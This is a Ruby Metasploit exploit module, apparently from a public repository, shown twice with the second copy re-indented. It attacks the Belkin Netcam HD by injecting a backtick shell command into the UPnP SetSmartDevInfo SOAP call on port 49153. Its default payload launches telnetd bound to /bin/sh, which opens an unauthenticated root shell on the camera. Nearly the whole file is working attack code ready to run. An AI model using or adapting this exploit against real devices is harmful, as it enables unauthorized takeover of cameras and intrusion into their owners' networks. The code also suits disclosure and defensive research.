phikshun/belkin_netcamhd_cmd_injection.rb

## belkin_netcamhd_cmd_injection.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'          => "Belkin Netcam HD UPnP Command Injection",
      'Description'   => %q{
        This module injects a shell command into the UPnP SetSmartDevInfo method.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'phikshun <0x41.phikshun@gmail.com>',  # Original discovery and Metasploit module
        ],
      'References'    =>
        [
          ['URL', 'http://disconnected.io/2014/04/04/universal-plug-and-fuzz/']
        ],
      'Privileged'    => true,
      'Platform'      => 'unix',
      'Arch'          => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic'
            }
        },
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/generic',
          'CMD'     => '/usr/sbin/telnetd -l/bin/sh'
        },
      'Targets'        =>
        [
          ['Belkin Netcam HD', {}],
        ],
      'Privileged'     => true,
      'DisclosureDate' => "April 04 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(49153)
      ], self.class
    )
  end

  def exploit
    print_status('Sending exploit')

    soap_payload = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <s:Body>
  <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
   <SmartDevURL>
    `#{payload.encoded}`
   </SmartDevURL>
  </u:SetSmartDevInfo>
 </s:Body>
</s:Envelope>
EOS
    soap_payload.gsub!("\n", "\r\n")
    send_request_cgi({
      'uri'     => '/upnp/control/basicevent1',
      'method'  => 'POST',
      'ctype'   => 'text/xml; charset="utf-8"',
      'headers' => {
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
      },
      'data'    => soap_payload
    })

    print_status('Exploit sent - telnet should be wide open')
  end
end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
	super(update_info(info,
	'Name' => "Belkin Netcam HD UPnP Command Injection",
	'Description' => %q{
	This module injects a shell command into the UPnP SetSmartDevInfo method.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'phikshun <0x41.phikshun@gmail.com>', # Original discovery and Metasploit module
	],
	'References' =>
	[
	['URL', 'http://disconnected.io/2014/04/04/universal-plug-and-fuzz/']
	],
	'Privileged' => true,
	'Platform' => 'unix',
	'Arch' => ARCH_CMD,
	'Payload' =>
	{
	'Space' => 1024,
	'DisableNops' => true,
	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'generic'
	}
	},
	'DefaultOptions' =>
	{
	'PAYLOAD' => 'cmd/unix/generic',
	'CMD' => '/usr/sbin/telnetd -l/bin/sh'
	},
	'Targets' =>
	[
	['Belkin Netcam HD', {}],
	],
	'Privileged' => true,
	'DisclosureDate' => "April 04 2014",
	'DefaultTarget' => 0))

	register_options(
	[
	Opt::RPORT(49153)
	], self.class
	)
	end

	def exploit
	print_status('Sending exploit')

	soap_payload = <<-EOS
	<?xml version="1.0" encoding="utf-8"?>
	<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
	<s:Body>
	<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
	<SmartDevURL>
	`#{payload.encoded}`
	</SmartDevURL>
	</u:SetSmartDevInfo>
	</s:Body>
	</s:Envelope>
	EOS
	soap_payload.gsub!("\n", "\r\n")
	send_request_cgi({
	'uri' => '/upnp/control/basicevent1',
	'method' => 'POST',
	'ctype' => 'text/xml; charset="utf-8"',
	'headers' => {
	'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
	},
	'data' => soap_payload
	})

	print_status('Exploit sent - telnet should be wide open')
	end
	end